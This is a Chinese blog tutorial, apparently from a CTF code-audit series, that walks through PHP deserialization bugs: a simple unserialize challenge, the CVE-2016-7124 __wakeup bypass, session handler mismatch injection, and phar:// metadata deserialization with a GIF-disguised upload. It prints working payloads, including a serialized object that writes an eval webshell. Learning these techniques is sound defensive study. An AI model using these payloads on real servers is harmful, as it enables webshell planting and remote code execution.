四个实例递进理解php反序列化漏洞

最新推荐文章于 2024-03-18 19:51:41 发布
最新推荐文章于 2024-03-18 19:51:41 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: ★ CTF # ——【 Code Audit】

0x00  D0g3

为了让大家进入状态,来一道简单的反序列化小题。

题目入口:http://120.79.33.253:9001

页面源码

<?php
error_reporting(0);
include "flag.php";
$KEY = "D0g3!!!";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
    echo "$flag";
}
show_source(__FILE__);
$KEY = "D0g3!!!";
print_r(serialize($KEY));

?str=s:7:"D0g3!!!"

 

 

0x01  绕过魔法函数的反序列化漏洞

漏洞编号CVE-2016-7124

魔法函数sleep() 和 wakeup()

php文档中定义__wakeup():

unserialize() 执行时会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup() 方法,预先准备对象需要的资源。

wakeup()经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。

sleep()则相反,是用在序列化一个对象时被调用。

class hodoger{
	
	function __wakeup()
	{
		echo "hello";
	}
}

$a = new hodoger();
$b = serialize($a);
$c = unserialize($b);

echo '<br >'; print_r($b); 
echo '<br >'; print_r($c);

 

漏洞剖析

PHP5 < 5.6.25
PHP7 < 7.0.10

这个漏洞核心:

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,比如下面这个类构造:

class hpdoger{
    public $a = 'nice to meet u';
    //增加一个$a
}

序列化这个类得到的结果:

O:7:"hpdoger":1:{s:1:"a";s:6:"nice to meet u";}

简单解释一下这个序列化字符串:

O代表结构类型为:类,7表示类名长度,接着是类名、属性(成员)个数

大括号内分别是:属性名类型、长度、名称;值类型、长度、值

 

正常情况下,反序列化一个类得到的结果:

class hodoger{
	
	public $a = 'nice to meet u';
	
	function __destruct()
	{
		echo 'Do not '.$this->a .PHP_EOL;
	}
	
	function __wakeup()
	{
		echo "hello".PHP_EOL;
	}
}

$b = 'O:7:"hodoger":1:{s:1:"a";s:14:"nice to meet u";}';
unserialize($b);

 

此时析构方法__destruct() 和 __wakeup() 都能够执行。

 

如果我们把传入的序列化字符串的属性个数更改成大于1的任何数

O:7:"hpdoger":2:{s:1:"a";s:6:"u know";}

得到的结果如图,__wakeup() 没有被执行,但是执行了析构函数。

 

假如我们的demo是这样的呢?

class A{
    var $a = "test";

    function __destruct(){
        $fp = fopen("D:\phpStudy\PHPTutorial\WWW\test\shell.php","w");
        fputs($fp,$this->a);
        fclose($fp);
    }

    function __wakeup()
        {
            foreach(get_object_vars($this) as $k => $v) {
                    $this->$k = null;
            }
        }
}

$hpdoger = $_POST['hpdoger'];
$clan = unserialize($hpdoger);

每次反序列化是都会调用__wakeup从而把$a值清空。但是,如果我们绕过wakeup不就能写Shell了?

既然反序列化的内容是可控的,就利用上述的方法绕过wakeup。

poc:

O:1:"A":2:{s:1:"a";s:27:"<?php eval($_POST["hp"]);?>";}

序列化漏洞常见的魔法函数

  • construct():当一个类被创建时自动调用
  • destruct():当一个类被销毁时自动调用
  • invoke():当把一个类当作函数使用时自动调用
  • tostring():当把一个类当作字符串使用时自动调用
  • wakeup():当调用unserialize()函数时自动调用
  • sleep():当调用serialize()函数时自动调用
  • __call():当要调用的方法不存在或权限不足时自动调用

 

 

0x02  Session反序列化漏洞

Session序列化机制

提到这个漏洞,就得先知道什么叫Session序列化机制。

当session_start()被调用或者php.ini中session.auto_start为1时,PHP内部调用会话管理器,访问用户session被序列化以后,存储到指定目录(默认为/tmp)。

PHP处理器的三种序列化方式:

处理器对应的存储格式
php_binary键名的长度对应的ASCII字符+键名+经过serialize() 函数反序列处理的值
php键名+竖线+经过serialize()函数反序列处理的值
php_serializeserialize()函数反序列处理数组方式

配置文件php.ini中含有这几个与session存储配置相关的配置项:

session.save_path=""   --设置session的存储路径,默认在/tmp
session.auto_start   --指定会话模块是否在请求开始时启动一个会话,默认为0不启动
session.serialize_handler   --定义用来序列化/反序列化的处理器名字。默认使用php

一个简单的demo(session.php)认识一下存储过程:

ini_set('session.serialize_handler','php_serialize');
session_start();
 
$_SESSION['hpdoger'] = $_GET['hpdoger'];

访问页面

http://localhost/test/session.php?hpdoger=lover

在session.save_path对应路径下会生成一个文件,名称例如:sess_1ja9n59ssk975tff3r0b2sojd5
因为选择的序列化处理方式为php_serialize,所以是被serialize()函数处理过的$_SESSION[‘hpdoger’]。

存储文件内容:

a:1:{s:7:"hpdoger";s:5:"lover";}

如果选择的序列化处理方式为php,即ini_set('session.serialize_handler','php');,则存储内容为:

hpdoger|s:5:"lover";

 

漏洞剖析

选择的处理方式不同,序列化和反序列化的方式亦不同。

如果网站序列化并存储Session与反序列化并读取Session的方式不同,就可能导致漏洞的产生。

这里提供一个demo:

存储Session页面

/*session.php*/
 
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
 
$_SESSION['hpdoger'] = $_GET['hpdoger'];
 
?>

可利用页面

/*test.php*/
 
<?php 
ini_set('session.serialize_handler','php');
session_start();
 
class hpdoger{
    var $a;
 
    function __destruct(){
        $fp = fopen("D:\wamp\www\exam\shell.php","w");
        fputs($fp,$this->a);
        fclose($fp);
    }
}
 
?>

/tmp目录下生成的session文件内容:

a:1:{s:7:"hpdoger";s:52:"|O:7:"hpdoger":1:{s:1:"a";s:17:"<?php phpinfo()?>";}";}

再访问test.php时反序列化已存储的session,新的php处理方式会把“|”后的值当作KEY值再serialize(),相当于我们实例化了这个页面的hpdoger类,相当于执行:

$_SESSION['hpdoger'] = new hpdoger();
$_SESSION['hpdoger']->a = '<?php phpinfo()?>';

在指定的目录D:\wamp\www\exam\shell.php中写入内容<?php phpinfo()?>

 

 

 

0x03  Jarvis-OJ PHPINFO【SESSION反序列化】

题目入口:http://web.jarvisoj.com:32784/index.php

解析:https://blog.csdn.net/dyw_666666/article/details/89371741#PHPINFO%EF%BC%88SESSION%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%89

 

 

0x04  phar伪协议触发php反序列化

漏洞剖析

phar文件会以序列化的形式存储用户自定义的meta-data,

在一些文件操作函数执行的参数可控,参数部分我们利用Phar伪协议,可以不依赖unserialize()直接进行反序列化操作,

在读取phar文件里的数据时反序列化meta-data,达到我们的操控目的。

而在一些上传点,我们可以更改phar的文件头并且修改其后缀名绕过检测,如:test.gif,

里面的meta-data却是我们提前写入的恶意代码,而且可利用的文件操作函数又很多,所以这是一种不错的绕过+执行的方法。

 

文件上传绕过demo

自己写了个丑陋的代码,只允许gif文件上传(实则有其他方法绕过,这里不赘述),代码部分如下

前端上传

<!DOCTYPE html>
<html>
<head>
	<title>test</title>
	<meta charset="utf-8">
</head>
<body>
	<form action="http://localhost/test/upload.php" method="post" enctype="multipart/form-data">
		<input type="file" name="hpdoger">
		<input type="submit" name="submit">
	</form>
</body>
</html>

后端验证

/*upload.php*/
<?php
    /*返回后缀名函数*/
    function getExt($filename){
        return substr($filename,strripos($filename,'.')+1);
    }
 
    /*检测MIME类型是否为gif*/
    if($_FILES['hpdoger']['type'] != "image/gif"){
        echo "Not allowed !";
        exit;
    }
    else{
        $filenameExt = strtolower(getExt($_FILES['hpdoger']['name']));    /*提取后缀名*/
 
        if($filenameExt != 'gif'){
            echo "Not gif !";
        }
        else{
            move_uploaded_file($_FILES['hpdoger']['tmp_name'], $_FILES['hpdoger']['name']);
            echo "Successfully!";
        }
    }
?>

代码判断了MIME类型+后缀判断,如下是我测试php文件的两个结果:

直接上传php

抓包更改content-type为 image/gif再次上传

可以看到两次都被拒绝上传,那我们更改phar后缀名再次上传

 

php环境编译生成一个phar文件,代码如下:

<?php 
class not_useful{
    var $file = "<?php phpinfo() ?>";
}
 
@unlink("hpdoger.phar");
$test = new not_useful();
$phar = new Phar("hpdoger.phar");
 
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // 增加gif文件头
$phar->setMetadata($test);
$phar->addFromString("test.txt","test");
 
$phar->stopBuffering();
?>

这里实例的类是为后面的demo做铺垫,php文件同目录下生成hpdoger.phar文件,我们更改名称为hpdoger.gif看一下。

gif头、phar识别序列、序列化后的字符串都具备

上传一下看能否成功,成功绕过检测在服务端存储一个hpdoger.gif

 

利用Phar://伪协议demo

我们已经上传了可解析的phar文件,现在需要找到一个文件操作函数的页面来利用,这里笔者写一个比较鸡肋的页面,目的是还原流程而非真实情况。

代码如下:reapperance.php

<?php
    $recieve = $_GET['recieve'];
 
    /*写入文件类操作*/
    class not_useful{
        var $file;
 
        function __destruct(){
        $fp = fopen("D:\phpStudy\PHPTutorial\WWW\test\shell.php","w"); //自定义写入路径
        fputs($fp,$this->file);
        fclose($fp);
    }
 
    file_get_contents($recieve);
 
?>

$recieve可控,符合我们的利用条件。那我们构造payload:

若执行成功,会将刚才写入meta-data数据里面序列化的类进行反序列化,并且实例了$file成员,导致文件写入,成功写入如下:

 

各种文件头

类型标识
JPEG头标识ff d8 ,结束标识ff d9
PNG头标识89 50 4E 47 0D 0A 1A 0A
GIF头标识(6 bytes) 47 49 46 38 39(37) 61 GIF89(7)a
BMP头标识(2 bytes) 42 4D BM

 

 

参考自:

https://blog.csdn.net/nzjdsds/article/details/82703639

https://blog.csdn.net/wy_97/article/details/78430690

烟敛寒林o
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于PHP代码审计的一些题目
Animation77的博客
09-07 1868
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2831
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
unserialize3中学习序列化和反序列化
weixin_52555162的博客
02-20 250
今天刷到这一题正好学习一下序列化和反序列化 一、什么是序列化和反序列化呢? 首先我们来想一下序列化到底好在哪里呢?为什么要用序列化?php序列化到底好在哪里? 首先我们可以知道这种方式肯定是为了传输数据的方便,你可以这样去理解,这样做就相当于你将一个实例化对象长久的储存在了计算机的磁盘上,无论什么时候调用你都可以把它恢复成原来的样子,这样做实际上是为了解决这个问题,因为当PHP文件在执行结束之后就会销毁这个对象,那么如果接下恰好你又需要调用这个对象,那肯定是不方便的,而且你也不能一直让这个对象存在..
ctfshow-php特性
YkingH的博客
01-26 5935
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
CTFshow_命令执行
qq_45927819的博客
11-20 1267
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
php代码逻辑题
kuzemax的博客
07-19 184
我们选中双引号里的hectf 复制左边的hex码,然后2个字符前加一个%。同时最后有一个include可以读取到data里的数组按照读取的形势我们可以判断出这是个二维数组。请注意,此条件中的一些字符似乎是反向的,这可能是一种试图绕过字符串匹配检查的技巧。是一个包含通过HTTP POST方法发送的变量和值的关联数组。的值转换为MD5哈希,并检查前27个字符是否与给定的值匹配。是一个包含通过URL查询字符串发送的变量和值的关联数组。选中中括号里的hectf同理,这就是我们要做的get请求。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
深入浅析PHP的session反序列化漏洞问题
10-19
PHP的Session反序列化漏洞问题,主要是因为不当的Session使用和不安全的反序列化操作,可能造成未授权访问、数据泄露甚至远程代码执行等安全风险。 首先,了解PHP的Session管理机制是非常重要的。在php.ini配置文件...
php反序列化漏洞 freebuf,入门Web需要了解的PHP反序列化漏洞
weixin_29973077的博客
03-09 683
前言最近才开始学习安全,虽然练习过南邮CTF和Bugku的CTF,但是打各种线上CTF经常不尽人意,因为最近的比赛都有着一个新手入门CTF不常遇到的考点—————反序列化。看了很多师傅们,各种前辈们的文章,于是想着总结一下已经学到的东西在我当时PHP基本功不怎么扎实的时候,看反序列化就是一脸懵逼,所以我认为在接触反序列化漏洞之前需要掌握以下内容看了上面的文章应该就会了类与对象,一些魔术方法(比较重...
PHP反序列化--_wakeup()绕过
最新发布
2302_79800344的博客
03-18 553
【代码】PHP反序列化--_wakeup()绕过。
PHP反序列化漏洞总结
未完成的歌~的博客
02-22 3660
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
四个实例递进php反序列化漏洞理解
大方子
09-14 8228
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
PHP序列化serialize()和反序列化unserialize()
weixin_30871701的博客
08-16 167
所谓的序列化,就是把保存在内存中的各种对象状态或属性保存起来,在需要时可以还原出来。 serialize() 可处理除了 resource 之外的任何类型返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。 甚至可以 serialize() 那些包含了指向其自身引用的数组。你正 serialize() 的数组/...
php代码审计9审计反序列化漏洞
weixin_30553777的博客
02-09 208
序列化与反序列化:序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化漏洞成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根据不同的代码可以导致各种攻击,如代码注入,sql注入,目录遍历等等序列化的不同结果public:private:protect:漏洞本质:unserialize函数的变量可控,php文件中存在可利用的类...
WEB漏洞-反序列化PHP
硫酸超的博客
08-26 636
WEB漏洞-反序列化PHP原理有类与无类php弱类型无类serialize()unserialize()PHP 反序列化热身题-无类问题-本地CTF 反序列化小真题-无类执行-实例有类触发魔术方法构造函数和析构函数__sleep() 和 __wakeup()__serialize() 和 __unserialize()CTF 反序列化练习题-有类魔术方法触发-本地网鼎杯 2020 青龙大真题-有类魔术方法触发-实例反序列化实战源代码分析 所有php里面的值都可以使用函数serialize()来返回一个包含
php中serialize()与unserialize()函数使用方法
BoGo专栏.PHP
02-07 3493
php中serialize()与unserialize()函数使用方法 在php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。 php函数serialize(): 这个函数作用就是序列化数据,返回一个可存储的字符串,该函数有利于存储或传递PHP的值,同
Session序列化选择器漏洞(ini_set('session.serialize_handler', 'php');)
qq_45521281的博客
05-02 2636
首先打开题目页面直接获得源码: <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php');#ini_set设置指定配置选项的值。这个选项会在脚本运行时保持新的值,并在脚本结束时恢复。 设置选择session序列化选择器 session_start(); class OowoO { p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值